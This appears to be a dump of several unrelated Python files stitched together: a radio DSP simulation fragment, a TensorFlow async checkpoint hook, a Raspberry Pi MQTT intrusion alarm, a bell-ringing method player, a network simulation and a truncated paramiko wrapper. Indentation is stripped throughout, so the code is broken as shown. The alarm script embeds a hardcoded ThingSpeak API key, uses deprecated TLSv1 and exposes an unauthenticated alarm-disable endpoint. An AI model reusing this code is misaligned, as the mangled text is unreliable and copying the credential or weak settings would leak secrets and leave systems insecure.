            self.print_log(type='I', msg="Applying RX output mode %s - User %s selected from all RXs" %(self.rx_output_mode, self.Userindex) )
for k in range(self.Rxantennas):
self._io_ofifo.data[k].udata.Data=seluser[k].reshape(-1,1)
self._io_ofifo.data[k].uindex.Data=self.Userindex*np.ones_like(self._io_ofifo.data[k].udata.Data[0].shape[0])
self._io_ofifo.rxindex.Data=0*np.ones_like(self._io_ofifo.data[k].udata.Data[0].shape[0])
elif (self.rx_output_mode==2):
            self.print_log(type='I', msg="Applying RX output mode %s - RX %s selected for all users" %(self.rx_output_mode, self.Rxindex) )
for k in range(self.Users):
self._io_ofifo.data[k].udata.Data=selrx[k].reshape(-1,1)
self._io_ofifo.data[k].uindex.Data=k*np.ones_like(self._io_ofifo.data[k].udata.Data[0].shape[0])
self._io_ofifo.data[k].rxindex.Data=self.Rxindex*np.ones_like(self._io_ofifo.data[k].udata.Data[0].shape[0])
elif (self.rx_output_mode==3):
            self.print_log(type='I', msg="Applying RX output mode %s - RX %s and user %s selected to output index 0" %(self.rx_output_mode, self.Rxindex, self.Userindex) )
for k in range(self.Users):
if k==0:
self._io_ofifo.data[k].udata.Data=selrxuser.reshape(-1,1)
self._io_ofifo.data[k].uindex.Data=self.Userindex
self._io_ofifo.rxindex.Data=self.Rxindex
else:
self._io_ofifo.data[k].udata.Data=np.zeros_like(selrxuser.reshape(-1,1))
self._io_ofifo.data[k].uindex.Data=self.Userindex*np.ones_like(self._io_ofifo.data[k].udata.Data[0].shape[0])
self._io_ofifo.rxindex.Data=self.Rxindex*np.ones_like(self._io_ofifo.data[k].udata.Data[0].shape[0])
elif (self.rx_output_mode==4):
            self.print_log(type='F', msg="RX output mode %s - User data streaming in serial manner is no longer supported" %(self.rx_output_mode) )
elif (self.rx_output_mode==5):
            self.print_log(type='F', msg="RX output mode %s - Streaming user data in time-interleaved indexed order from four DSP outputs is no longer supported" %(self.rx_output_mode) )
elif (self.rx_output_mode==6):
            self.print_log(type='I', msg="Applying RX output mode %s - Summed data is streamed out. Output position index is the user index" %(self.rx_output_mode) )
for k in range(self.Users):
self._io_ofifo.data[k].udata.Data=sumuserstream[:,k].reshape(-1,1)
self._io_ofifo.data[k].uindex.Data=k*np.ones_like(self._io_ofifo.data[k].udata.Data[0].shape[0])
self._io_ofifo.rxindex.Data=0*np.ones_like(self._io_ofifo.data[k].udata.Data[0].shape[0])
else:
#Bypass
            self.print_log(type='I', msg="Applying RX output mode %s - Bypass" %(self.rx_output_mode) )
for k in range(self.Rxantennas):
self._io_ofifo.data[k].udata.Data=self.iptr_A.Data[k].Data.reshape(-1,1)
self._io_ofifo.data[k].uindex.Data=k*np.ones_like(self._io_ofifo.data[k].udata.Data[0].shape[0])
self._io_ofifo.rxindex.Data=0*np.ones_like(self._io_ofifo.data[k].udata.Data[0].shape[0])
def distribute_result(self,result):
for k in range(self.Users):
if self.par:
self.queue.put(result[:,k].reshape(-1,1))
self._io_ofifo.data[k].udata.Data=result[:,k].reshape((-1,1))
def write_infile(self):
rndpart=os.path.basename(tempfile.mkstemp()[1])
if self.model=='sv':
self._infile=self._vlogsimpath +'/A_' + rndpart +'.txt'
self._outfile=self._vlogsimpath +'/Z_' + rndpart +'.txt'
elif self.model=='vhdl':
pass
else:
pass
try:
os.remove(self._infile)
except:
pass
for i in range(self.Users):
if i==0:
indata=self.iptr_A.Data[i].Data.reshape(-1,1)
else:
indata=np.r_['1',indata,self.iptr_A.Data[i].Data.reshape(-1,1)]
fid=open(self._infile,'wb')
np.savetxt(fid,indata.view(float),fmt='%i', delimiter='\t')
fid.close()
def read_outfile(self):
fid=open(self._outfile,'r')
fromfile = np.loadtxt(fid,dtype=complex,delimiter='\t')
#Of course it does not work symmetrically with savetxt
for i in range(self.Users):
if i==0:
out=np.zeros((fromfile.shape[0],int(fromfile.shape[1]/2)),dtype=complex)
out[:,i]=(fromfile[:,2*i]+1j*fromfile[:,2*i+1])
else:
out[:,i]=(fromfile[:,2*i]+1j*fromfile[:,2*i+1])
maximum=np.amax([np.abs(np.real(out[:,i])), np.abs(np.imag(out[:,i]))])
str="Output signal range is %i" %(maximum)
self.print_log(type='I', msg=str)
fid.close()
#os.remove(self._outfile)
#Copy the value to multiple outputs for users
self.distribute_result(out)
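# A minimal, self-contained sketch (not part of the original class) of the text
# round trip used by write_infile()/read_outfile() above: complex samples are
# written as interleaved integer real/imag columns with savetxt, and loadtxt
# does not reverse this automatically, so the columns are recombined by hand.
# The file path is a hypothetical placeholder.
def _demo_complex_txt_roundtrip(path='/tmp/Z_demo.txt'):
    import numpy as np
    users = 2
    data = (np.arange(8) + 1j * np.arange(8))[:, None] * np.ones((1, users))
    with open(path, 'wb') as fid:
        # .view(float) interleaves real and imaginary parts column-wise
        np.savetxt(fid, data.view(float), fmt='%i', delimiter='\t')
    fromfile = np.loadtxt(path, dtype=float, delimiter='\t')
    out = fromfile[:, 0::2] + 1j * fromfile[:, 1::2]
    assert np.allclose(out, data)
    return out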
|
async_checkpoint.py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ======================================
"""Hook for asynchronous checkpointing.
This hook dispatches checkpoint writing operations in a separate thread to
allow execution to continue on the main thread.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import threading
import time
from tensorflow.core.util.event_pb2 import SessionLog
from tensorflow.python.framework import meta_graph
from tensorflow.python.framework import ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import training_util
from tensorflow.python.training.session_run_hook import SessionRunArgs
from tensorflow.python.training.summary_io import SummaryWriterCache
class AsyncCheckpointSaverHook(basic_session_run_hooks.CheckpointSaverHook):
"""Saves checkpoints every N steps or seconds."""
def __init__(self,
checkpoint_dir,
save_secs=None,
save_steps=None,
saver=None,
checkpoint_basename="model.ckpt",
scaffold=None,
listeners=None):
"""Initializes a `CheckpointSaverHook`.
Args:
checkpoint_dir: `str`, base directory for the checkpoint files.
save_secs: `int`, save every N secs.
save_steps: `int`, save every N steps.
saver: `Saver` object, used for saving.
checkpoint_basename: `str`, base name for the checkpoint files.
scaffold: `Scaffold`, use to get saver object.
listeners: List of `CheckpointSaverListener` subclass instances. Used for
callbacks that run immediately before or after this hook saves the
checkpoint.
Raises:
ValueError: One of `save_steps` or `save_secs` should be set.
ValueError: At most one of `saver` or `scaffold` should be set.
"""
logging.info("Create AsyncCheckpointSaverHook.")
if saver is not None and scaffold is not None:
raise ValueError("You cannot provide both saver and scaffold.")
self._saver = saver
self._save_thread = None
self._write_graph_thread = None
self._checkpoint_dir = checkpoint_dir
self._save_path = os.path.join(checkpoint_dir, checkpoint_basename)
self._scaffold = scaffold
self._timer = basic_session_run_hooks.SecondOrStepTimer(
every_secs=save_secs, every_steps=save_steps)
self._listeners = listeners or []
self._steps_per_run = 1
self._summary_writer = None
self._global_step_tensor = None
def _set_steps_per_run(self, steps_per_run):
self._steps_per_run = steps_per_run
def begin(self):
self._summary_writer = SummaryWriterCache.get(self._checkpoint_dir)
self._global_step_tensor = training_util._get_or_create_global_step_read() # pylint: disable=protected-access
if self._global_step_tensor is None:
raise RuntimeError(
"Global step should be created to use CheckpointSaverHook.")
for l in self._listeners:
l.begin()
def after_create_session(self, session, coord):
global_step = session.run(self._global_step_tensor)
# The graph and saver_def are written here, at the first call of
# after_create_session, rather than in begin(): other hooks may still modify
# the graph and add variables in their begin() calls, and the graph is only
# finalized after all begin() calls have run.
def _write_graph_fn(self):
training_util.write_graph(
ops.get_default_graph().as_graph_def(add_shapes=True),
self._checkpoint_dir, "graph.pbtxt")
self._write_graph_thread = threading.Thread(target=_write_graph_fn)
self._write_graph_thread.start()
saver_def = self._get_saver().saver_def if self._get_saver() else None
graph = ops.get_default_graph()
meta_graph_def = meta_graph.create_meta_graph_def(
graph_def=graph.as_graph_def(add_shapes=True), saver_def=saver_def)
self._summary_writer.add_graph(graph)
self._summary_writer.add_meta_graph(meta_graph_def)
# The checkpoint saved here is the state at step "global_step".
self._save(session, global_step)
self._timer.update_last_triggered_step(global_step)
def before_run(self, run_context): # pylint: disable=unused-argument
return SessionRunArgs(self._global_step_tensor)
def after_run(self, run_context, run_values):
global_step = run_context.session.run(self._global_step_tensor)
if self._timer.should_trigger_for_step(global_step):
self._timer.update_last_triggered_step(global_step)
logging.info("Triggering checkpoint. %s", global_step)
if self._save(run_context.session, global_step):
run_context.request_stop()
def end(self, session):
if self._save_thread:
logging.info("Waiting for any pending checkpoints to finish.")
self._save_thread.join()
if self._write_graph_thread:
logging.info("Waiting for any pending write_graph to finish.")
self._write_graph_thread.join()
last_step = session.run(self._global_step_tensor)
# Save the last checkpoint synchronously if needed.
if last_step != self._timer.last_triggered_step():
self._save(session, last_step, asynchronous=False)
for l in self._listeners:
l.end(session, last_step)
def _save(self, session, step, asynchronous=True):
"""Saves the latest checkpoint, returns should_stop."""
# Skip saving on step 0
if step == 0:
return
def _save_fn():
"""Run the saver process."""
logging.info("Saving checkpoints for %d into %s.", step, self._save_path)
start_time = time.time()
for l in self._listeners:
l.before_save(session, step)
self._get_saver().save(session, self._save_path, global_step=step)
self._summary_writer.add_session_log(
SessionLog(
status=SessionLog.CHECKPOINT, checkpoint_path=self._save_path),
step)
end_time = time.time()
logging.info("Checkpoint actual writing time: (%.3f sec)",
end_time - start_time)
logging.info("Checkpoint finished for %d into %s.", step, self._save_path)
for l in self._listeners:
l.after_save(session, step)
if not asynchronous:
_save_fn()
return
if self._save_thread is not None:
self._save_thread.join(timeout=0.1)
if self._save_thread.is_alive():
logging.info("Saver thread still in progress, skipping checkpoint.")
return
self._save_thread = threading.Thread(target=_save_fn)
self._save_thread.start()
def _get_saver(self):
if self._saver is not None:
return self._saver
elif self._scaffold is not None:
return self._scaffold.saver
# Get saver from the SAVERS collection if present.
collection_key = ops.GraphKeys.SAVERS
savers = ops.get_collection(collection_key)
if not savers:
raise RuntimeError(
"No items in collection {}. Please add a saver to the collection "
"or provide a saver or scaffold.".format(collection_key))
elif len(savers) > 1:
raise RuntimeError(
"More than one item in collection {}. "
"Please indicate which one to use by passing it to the constructor."
.format(collection_key))
self._saver = savers[0]
return savers[0]
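# A minimal usage sketch (an assumption, not part of the original file): attach
# the hook to a TF1-style MonitoredTrainingSession so checkpoints are written
# on a background thread every `save_steps` global steps. The checkpoint
# directory below is a hypothetical placeholder.
def _demo_async_checkpoint(checkpoint_dir="/tmp/async_ckpt_demo"):
  import tensorflow.compat.v1 as tf
  if hasattr(tf, "disable_eager_execution"):
    tf.disable_eager_execution()
  global_step = tf.train.get_or_create_global_step()
  train_op = tf.assign_add(global_step, 1)
  hook = AsyncCheckpointSaverHook(checkpoint_dir, save_steps=10)
  # checkpoint_dir=None keeps MonitoredTrainingSession from adding its own
  # synchronous CheckpointSaverHook next to the asynchronous one.
  with tf.train.MonitoredTrainingSession(checkpoint_dir=None,
                                         hooks=[hook]) as sess:
    for _ in range(25):
      sess.run(train_op)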
|
run1.py
|
import datetime
import threading
import time
import paho.mqtt.publish as publish
import requests
from flask import Flask
from grove.gpio import GPIO
from grove.grove_ultrasonic_ranger import GroveUltrasonicRanger
import logging
# Connect the GroveUltrasonicRanger to D5 & D16
ultrasonic_ranger_1 = GroveUltrasonicRanger(5)
ultrasonic_ranger_2 = GroveUltrasonicRanger(16)
# Connect the buzzer to digital port 6
buzzer = GPIO(6, GPIO.OUT)
# Connect led to digital port 17
led = GPIO(17, GPIO.OUT)
app = Flask(__name__)
# variable states
alarmActive = False
buzzerActive = 0
testColor = 0
last_ultrasonic_ranger_1 = False
last_ultrasonic_ranger_2 = False
trigger_distance = 120
time_a = datetime.time(22, 0)
time_b = datetime.time(5, 00)
delay = 0.1
def is_bad_time():
now_time = datetime.datetime.now().time()
if time_a < time_b:
return time_a <= now_time <= time_b
else:
return time_a <= now_time or now_time <= time_b
def whee_u_whee_u():
global buzzerActive, testColor
buzzerActive = (buzzerActive + 1) % 2
testColor = (testColor + 1) % 2
buzzer.write(buzzerActive)
led.write(testColor)
def entry():
global alarmActive
publish.single(topic, payload="field1=1", hostname=mqttHost, port=tPort, tls=tTLS, transport=tTransport)
logging.info("entry detected")
if is_bad_time():
logging.info("alarm triggered")
requests.get('http://raspi2:5000/trigger_alarm')
alarmActive = True
def exit():
publish.single(topic, payload="field2=1", hostname=mqttHost, port=tPort, tls=tTLS, transport=tTransport)
logging.info("exit detected")
def clear():
buzzer.write(0)
led.write(0)
def loop():
global last_ultrasonic_ranger_1, last_ultrasonic_ranger_2
try:
while True:
new_ultrasonic_ranger_1 = ultrasonic_ranger_1.get_distance() < trigger_distance
new_ultrasonic_ranger_2 = ultrasonic_ranger_2.get_distance() < trigger_distance
if last_ultrasonic_ranger_1 and new_ultrasonic_ranger_2 and not last_ultrasonic_ranger_2:
entry()
elif last_ultrasonic_ranger_2 and new_ultrasonic_ranger_1 and not last_ultrasonic_ranger_1:
exit()
last_ultrasonic_ranger_1 = new_ultrasonic_ranger_1
last_ultrasonic_ranger_2 = new_ultrasonic_ranger_2
if alarmActive:
whee_u_whee_u()
time.sleep(delay)
finally:
clear()
@app.route("/kill_alarm")
def kill_alarm():
global alarmActive
alarmActive = False
clear()
logging.info("alarm killed")
publish.single(topic, payload="field3=1", hostname=mqttHost, port=tPort, tls=tTLS, transport=tTransport)
return "kill_alarm"
def setup_mqtt():
global topic, mqttHost, tPort, tTLS, tTransport
channelID = "931380"
apiKey = "PCLULCAKPMI6IU1J"
mqttHost = "mqtt.thingspeak.com"
import ssl
tTransport = "websockets"
tTLS = {'ca_certs': "/etc/ssl/certs/ca-certificates.crt", 'tls_version': ssl.PROTOCOL_TLSv1}
tPort = 443
topic = "channels/" + channelID + "/publish/" + apiKey
if __name__ == '__main__':
setup_mqtt()
logging.info('Started application')
thread = threading.Thread(target=loop)
thread.start()
app.run(host="0.0.0.0")
|
Methods.py
|
from threading import Thread
import socket
from time import sleep
from sys import byteorder
from Config import Config
import configparser
from Row import Row
import os
import sys
from random import randrange
def bell_indicators(MAX_BELLS,
INDICATE_BELL_NUMBER_SHIFT,
INDICATE_BELL_HANDSTROKE,
INDICATE_BELL_BACKSTROKE,
INDICATE_BELL_GRAPHIC_SHOW,
INDICATE_BELL_GRAPHIC_CLEAR):
hand = {}
back = {}
graphic_show = {}
graphic_clear = {}
for ndx in range(MAX_BELLS):
hand[ndx] = INDICATE_BELL_HANDSTROKE | (ndx << INDICATE_BELL_NUMBER_SHIFT)
back[ndx] = INDICATE_BELL_BACKSTROKE | (ndx << INDICATE_BELL_NUMBER_SHIFT)
graphic_show[ndx] = INDICATE_BELL_GRAPHIC_SHOW | (ndx << INDICATE_BELL_NUMBER_SHIFT)
graphic_clear[ndx] = INDICATE_BELL_GRAPHIC_CLEAR | (ndx << INDICATE_BELL_NUMBER_SHIFT)
return hand, back, graphic_show, graphic_clear
class Row():
def __init__(self, number_of_bells):
self.positions = [None for ndx in range(number_of_bells)]
self.call_go = False
self.call_thats_all = False
self.call_bob = False
self.call_single = False
self.call_stand = False
def __str__(self):
say = ''
if self.call_go:
say += 'Go Method '
if self.call_thats_all:
say += 'Thats All '
if self.call_bob:
say += 'Bob '
if self.call_single:
say += 'Single '
if self.call_stand:
say += 'Stand Next '
say += str(self.positions)
return say
class Extent():
LEAD_TYPE_PLAIN = 'P'
LEAD_TYPE_BOB = 'B'
LEAD_TYPE_SINGLE = 'S'
def __init__(self, method, extent_id, cover = True, intro_courses = 1, extent_courses = 1, wait_learner = False):
self.name = method.extent_name(extent_id)
self.length = method.extent_length(extent_id) * extent_courses
self.definition = method.extent_definition(extent_id)
self.wait = wait_learner
# If the extent is mutable it can be shuffled: the sections that can be
# shifted are delimited by '-' characters, so the definition is split into
# sections, each section is rotated by a random amount, and the pieces are
# joined back together
if method.extent_mutable(extent_id):
# Remove all formatting spaces
self.definition = self.definition.replace(' ', '')
# Break into sections
sections = self.definition.split('-')
for ndx in range(len(sections)):
s = sections[ndx]
# Decide how many shifts to perform on the section
shifts = randrange(len(s))
for shift in range(shifts):
s = s[-1] + s[0:-1]
sections[ndx] = s
# Reassemble the sections
self.definition = ''.join(sections)
# The number of bells being rung is the number of bells in the method plus the optional cover
self.number_of_bells = method.number_of_bells()
self.cover = cover
if self.cover:
self.number_of_bells += 1
# A reference to the parent method is only needed for dumping to text
self.method = method
self.rows = []
# The last lead is 'plain' to force a plain start in the first lead
last_lead = Extent.LEAD_TYPE_PLAIN
for courses in range(extent_courses):
# Build the course
for lead in self.definition:
Extent._add_lead_start(last_lead, self.rows, method, self.length, cover)
if lead in ('p', 'P'):
Extent._add_plain(self.rows, method, self.length, cover)
last_lead = Extent.LEAD_TYPE_PLAIN
elif lead in ('b', 'B'):
Extent._add_bob(self.rows, method, self.length, cover)
last_lead = Extent.LEAD_TYPE_BOB
elif lead in ('s', 'S'):
Extent._add_single(self.rows, method, self.length, cover)
last_lead = Extent.LEAD_TYPE_SINGLE
# Add the intro rounds and the Go Method call to the last backstroke of the intro
intro = []
for ndx in range(intro_courses):
Extent._add_round(intro, self.number_of_bells)
intro[((intro_courses - 1) * 2) + 1].call_go = True
self.rows = intro + self.rows
# Add That's All to the second to last row of the extent
self.rows[len(self.rows) - 2].call_thats_all = True
# If the extent ended on a back stroke add the extra half round
if len(self.rows) % 2 != 0:
Extent._add_half_round(self.rows, self.number_of_bells)
# Add the final rounds and the call to Stand
Extent._add_round(self.rows, self.number_of_bells)
self.rows[len(self.rows) - 2].call_stand = True
def _add_half_round(rows, bells):
row = Row(bells)
for ndx in range(bells):
row.positions[ndx] = ndx + 1
rows.append(row)
def _add_round(rows, bells):
Extent._add_half_round(rows, bells)
Extent._add_half_round(rows, bells)
def _add_lead_start(last_lead, rows, method, length, cover):
if last_lead == Extent.LEAD_TYPE_PLAIN:
Extent._apply(rows, method.number_of_bells(), method.plain_start, length, cover)
elif last_lead == Extent.LEAD_TYPE_BOB:
Extent._apply(rows, method.number_of_bells(), method.bob_start, length, cover)
elif last_lead == Extent.LEAD_TYPE_SINGLE:
Extent._apply(rows, method.number_of_bells(), method.single_start, length, cover)
def _add_plain(rows, method, length, cover):
Extent._apply(rows, method.number_of_bells(), method.tracks, length, cover)
Extent._apply(rows, method.number_of_bells(), method.plain, length, cover)
def _add_bob(rows, method, length, cover):
Extent._apply(rows, method.number_of_bells(), method.tracks, length, cover)
# Call the Bob at the beginning of the last row BEFORE the Bob
rows[len(rows) - 1].call_bob = True
Extent._apply(rows, method.number_of_bells(), method.bob, length, cover)
def _add_single(rows, method, length, cover):
Extent._apply(rows, method.number_of_bells(), method.tracks, length, cover)
# Call the Single at the beginning of the last row BEFORE the Single
rows[len(rows) - 1].call_single = True
Extent._apply(rows, method.number_of_bells(), method.single, length, cover)
def _apply(rows, number_of_bells, work, length, cover):
prev = len(rows) - 1
bells = number_of_bells
if cover:
bells += 1
if len(work) > 0:
for ndx in range(len(work[0])):
if length > len(rows):
row = Row(bells)
if cover:
row.positions[bells -1] = bells
rows.append(row)
for track in range(number_of_bells):
if prev < 0:
bell = track + 1
else:
bell = rows[prev].positions[track]
curr = prev + 1
for t in work[track]:
if curr < length:
rows[curr].positions[t - 1] = bell
curr += 1
def to_mdf(self):
print('[INFO]')
print('name={} {}'.format(self.method.name, self.name))
print('bells={}'.format(self.method.number_of_bells()))
print('rows={}'.format(self.length))
print()
# For dump purposes 'assume' there are two intro and two extro rounds
print('[ROWS]')
row_id = 1
for ndx in range(self.length):
r = self.rows[ndx + 2]
print('M{:04}='.format(row_id,), end = '')
if r.call_bob:
print('(B) ', end = '')
if r.call_single:
print('(S) ', end = '')
for p in range(self.method.number_of_bells()):
print('{} '.format(r.positions[p]), end = '')
print()
row_id += 1
def dump(self):
row_id = -1
for r in self.rows:
print('M{:04}='.format(row_id,), end = '')
if r.call_bob:
print('(B) ', end = '')
if r.call_single:
print('(S) ', end = '')
for p in r.positions:
print('{} '.format(p), end = '')
print()
row_id += 1
class Method():
def __init__(self, file):
self.definition = configparser.ConfigParser()
self.definition.optionxform = str # Don't want keys to be lower cased
self.definition.read(file)
self.name = self.definition.get('INFO', 'name')
self.tracks = {}
for key in self.definition['TRACKS']:
self.tracks[int(key) - 1] = [int(v) for v in self.definition['TRACKS'][key].split()]
# Some methods may have Bobs and Singles whose effect carries across the end
# of one lead and into the start of the next. To account for this, the start
# of a lead can differ depending on the type of the previous lead. The
# PLAIN_START, BOB_START and SINGLE_START sections of the definition files
# are optional, as they are not needed for most methods
self.plain_start = {}
if self.definition.has_section('PLAIN_START'):
for key in self.definition['PLAIN_START']:
self.plain_start[int(key) - 1] = [int(v) for v in self.definition['PLAIN_START'][key].split()]
self.plain = {}
if self.definition.has_section('PLAIN'):
for key in self.definition['PLAIN']:
self.plain[int(key) - 1] = [int(v) for v in self.definition['PLAIN'][key].split()]
self.bob_start = {}
if self.definition.has_section('BOB_START'):
for key in self.definition['BOB_START']:
self.bob_start[int(key) - 1] = [int(v) for v in self.definition['BOB_START'][key].split()]
self.bob = {}
if self.definition.has_section('BOB'):
for key in self.definition['BOB']:
self.bob[int(key) - 1] = [int(v) for v in self.definition['BOB'][key].split()]
self.single_start = {}
if self.definition.has_section('SINGLE_START'):
for key in self.definition['SINGLE_START']:
self.single_start[int(key) - 1] = [int(v) for v in self.definition['SINGLE_START'][key].split()]
self.single = {}
if self.definition.has_section('SINGLE'):
for key in self.definition['SINGLE']:
self.single[int(key) - 1] = [int(v) for v in self.definition['SINGLE'][key].split()]
# NOTE: the method name is exposed as the instance attribute self.name set in
# __init__; an accessor method of the same name would be shadowed by it.
def extent_exists(self, extent_id):
key = 'EXTENT-' + str(extent_id)
return key in self.definition
def number_of_bells(self):
return self.definition.getint('INFO', 'bells')
def coverable(self):
return self.definition.getboolean('INFO', 'coverable', fallback = False)
def extent_name(self, key):
return self.definition.get(key, 'NAME')
def extent_length(self, key):
return self.definition.getint(key, 'LENGTH')
def extent_size(self, key, cover, intros, courses):
bells = self.number_of_bells()
if self.coverable() and cover:
bells += 1
size = self.extent_length(key) * bells * courses
size += intros * bells * 2
size += bells * 2 # Always two extro rounds
return size
def extent_definition(self, key):
return self.definition.get(key, 'DEFINITION')
def extent_mutable(self, key):
return self.definition.getboolean(key, 'MUTABLE', fallback = False)
def methods(conn, ring_addr, ring_port):
app_path = getattr(sys, '_MEIPASS', os.path.abspath(os.path.dirname(__file__)))
config = Config()
MAX_BELLS = config.getint('BELLS', 'bells')
GO = config.getint('STRIKE_COMMANDS', 'go')
THATS_ALL = config.getint('STRIKE_COMMANDS', 'thats_all')
BOB = config.getint('STRIKE_COMMANDS', 'bob')
SINGLE = config.getint('STRIKE_COMMANDS', 'single')
STAND = config.getint('STRIKE_COMMANDS', 'stand_next')
INDICATE_BELL_NUMBER_SHIFT = config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_bell_number_shift')
INDICATE_BELL_HANDSTROKE = config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_type_bell') << config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_type_shift')
INDICATE_BELL_BACKSTROKE = INDICATE_BELL_HANDSTROKE + \
(config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_stroke_mask') << config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_stroke_shift'))
INDICATE_BELL_GRAPHIC_CLEAR = config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_type_graphic') << config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_type_shift')
INDICATE_BELL_GRAPHIC_SHOW = INDICATE_BELL_GRAPHIC_CLEAR + \
(config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_graphic_mask') << config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_graphic_shift'))
handstroke_indicators, backstroke_indicators, graphic_show_indicators, graphic_clear_indicators = bell_indicators(MAX_BELLS,
INDICATE_BELL_NUMBER_SHIFT,
INDICATE_BELL_HANDSTROKE,
INDICATE_BELL_BACKSTROKE,
INDICATE_BELL_GRAPHIC_SHOW,
INDICATE_BELL_GRAPHIC_CLEAR)
bells = [True] * MAX_BELLS
bells_rung = [False] * MAX_BELLS
stop_playing = False
method = None
extent = None
pace = 3.0
pause = pace / MAX_BELLS
courses = 1
intro_rounds = 1
def play(ring_port):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ndx = 0
stroke_type = "B"
LOOK_TO = config.getint('STRIKE_COMMANDS', 'look_to')
sock.sendto(LOOK_TO.to_bytes(1, byteorder), (ring_addr, ring_port))
sleep(4)
for row in extent.rows:
if stop_playing:
break
if row.call_go:
sock.sendto(GO.to_bytes(1, byteorder), (ring_addr, ring_port))
if row.call_thats_all:
sock.sendto(THATS_ALL.to_bytes(1, byteorder), (ring_addr, ring_port))
if row.call_bob:
sock.sendto(BOB.to_bytes(1, byteorder), (ring_addr, ring_port))
if row.call_single:
sock.sendto(SINGLE.to_bytes(1, byteorder), (ring_addr, ring_port))
if row.call_stand:
sock.sendto(STAND.to_bytes(1, byteorder), (ring_addr, ring_port))
stroke_type = "H" if stroke_type == "B" else "B"
for strike in row.positions:
if stop_playing:
break
sock.sendto(graphic_show_indicators[strike - 1].to_bytes(1, byteorder), (config.get('GUI_EVENT_LISTENER', 'addr',), config.getint('GUI_EVENT_LISTENER', 'port')))
sleep(pause / 2.0)
if stroke_type == 'H':
indicator = backstroke_indicators[strike - 1]
else:
indicator = handstroke_indicators[strike - 1]
sock.sendto(indicator.to_bytes(1, byteorder), (config.get('GUI_EVENT_LISTENER', 'addr',), config.getint('GUI_EVENT_LISTENER', 'port')))
if bells[strike - 1]:
sock.sendto(strike.to_bytes(1, byteorder), (ring_addr, ring_port))
else:
if extent.wait:
while not bells_rung[strike - 1] and not stop_playing:
sleep(0.01)
bells_rung[strike - 1] = False
sleep(pause / 2.0)
sock.sendto(graphic_clear_indicators[strike - 1].to_bytes(1, byteorder), (config.get('GUI_EVENT_LISTENER', 'addr',), config.getint('GUI_EVENT_LISTENER', 'port')))
if stroke_type == 'B':
# Hand stroke lead pause
sleep(pause)
t = None
while True:
command = conn.recv().split(",")
if command[0] == "Exit":
stop_playing = True
if t and t.is_alive():
t.join()
break
elif command[0] == "Start":
stop_playing = False
if method:
t = Thread(target = play, args = (ring_port,))
t.start()
elif command[0] == "Stop":
stop_playing = True
if t and t.is_alive():
t.join()
elif command[0] == 'Pace':
pace = float(command[1])
if extent:
pause = pace / extent.number_of_bells
else:
pause = pace / MAX_BELLS
elif command[0] == "Load":
method = Method(app_path + '/data/' + command[1] + '.mcf')
extent = Extent(method, extent_id = command[2], cover = (command[3] == 'cover'), intro_courses = int(command[4]), extent_courses = int(command[5]), wait_learner = (command[6] == 'True'))
# extent.dump()
extent.to_mdf()
pause = pace / extent.number_of_bells
elif command[0] == "Play":
bell = int(command[1])
bells[bell - 1] = command[2] == "True"
elif command[0] == "Rung":
bell = int(command[1])
bells_rung[bell - 1] = True
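# A minimal driver sketch (an assumption, not part of the original module):
# methods() blocks on conn.recv(), so one way to exercise it is to run it in a
# child process and talk to it over a multiprocessing Pipe. The ring address,
# port and the commented-out method/extent names are hypothetical placeholders,
# and the sketch assumes the ini file read by Config() is available.
def _demo_drive_methods(ring_addr='127.0.0.1', ring_port=5000):
    from multiprocessing import Pipe, Process
    parent_conn, child_conn = Pipe()
    worker = Process(target=methods, args=(child_conn, ring_addr, ring_port))
    worker.start()
    parent_conn.send('Pace,3.0')
    # parent_conn.send('Load,PlainBob,EXTENT-1,cover,1,1,False')
    # parent_conn.send('Start')
    parent_conn.send('Exit')
    worker.join()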
|
simulation_1.py
|
#Laura Sullivan-Russett and Grace Walkuski
#CSCI 466
#PA3
#November 2, 2018
import network_1
import link_1
import threading
from time import sleep
##configuration parameters
router_queue_size = 0 #0 means unlimited
simulation_time = 1 #give the network sufficient time to transfer all packets before quitting
if __name__ == '__main__':
object_L = [] #keeps track of objects, so we can kill their threads
#create network nodes
client = network_1.Host(1)
object_L.append(client)
server = network_1.Host(2)
object_L.append(server)
router_a = network_1.Router(name='A', intf_count=1, max_queue_size=router_queue_size)
object_L.append(router_a)
#create a Link Layer to keep track of links between network nodes
link_layer = link_1.LinkLayer()
object_L.append(link_layer)
#add all the links
#link parameters: from_node, from_intf_num, to_node, to_intf_num, mtu
link_layer.add_link(link_1.Link(client, 0, router_a, 0, 50))
link_layer.add_link(link_1.Link(router_a, 0, server, 0, 50))
#start all the objects
thread_L = []
thread_L.append(threading.Thread(name=client.__str__(), target=client.run))
thread_L.append(threading.Thread(name=server.__str__(), target=server.run))
thread_L.append(threading.Thread(name=router_a.__str__(), target=router_a.run))
thread_L.append(threading.Thread(name="Network", target=link_layer.run))
for t in thread_L:
t.start()
#create some send events
for i in range(3):
client.udt_send(2, 'Sample data %d that is too long to deliver through the current MTU length of 50 characters.' % i)
#give the network sufficient time to transfer all packets before quitting
sleep(simulation_time)
#join all threads
for o in object_L:
o.stop = True
for t in thread_L:
t.join()
print("All simulation threads joined")
# writes to host periodically
|
command.py
|
import threading
from typing import Optional
from paramiko.channel import ChannelStdinFile, ChannelFile, ChannelStderrFile
class RemoteCommand:
"""
RemoteCommand wraps the IO pipes of a paramiko command. It can be used as a
context manager and uses threads to capture IO asynchronously. On exit of the
with-statement the command is aborted if it has not exited yet. Use
RemoteCommand.wait to block until the command exits; note that if a
